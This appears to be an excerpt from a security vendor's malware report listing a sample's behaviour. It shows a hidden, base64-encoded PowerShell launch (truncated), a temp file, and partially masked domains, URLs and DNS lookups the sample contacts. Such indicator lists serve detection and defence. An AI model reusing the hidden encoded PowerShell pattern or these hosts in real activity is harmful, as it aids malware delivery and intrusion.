Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABKAGQAeQB1AGsAawBmAHEAPQAnAE4AYQB5AGEAZgBxAHYAZABhAHAAbgBxACcAOwAkAFkAdAB2AHAAeAB2AHMAdQBxAGgAYwB3ACAAPQAgACcANwA5ADgAJwA7ACQATwB6AGEAYQBvAGgAcQB1AGUAcwBoAHIAawA9ACcAUQBpAHEAZAB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1452
- %TEMP%\979280.cvr
- 'mo###xtend.com':80
- 'hu###omains.com':443
- 'di###genics.com':80
- 'al#####ehomepackers.com':80
- 'ro####ueennyc.com':443
- http://www.mo###xtend.com/New_website/x/
- http://di###genics.com/usi/g/
- 'hu###omains.com':443
- 'ro####ueennyc.com':443
- DNS ASK mo###xtend.com
- DNS ASK hu###omains.com
- DNS ASK di###genics.com
- DNS ASK al#####ehomepackers.com
- DNS ASK bi######icesvictoria.com
- DNS ASK ro####ueennyc.com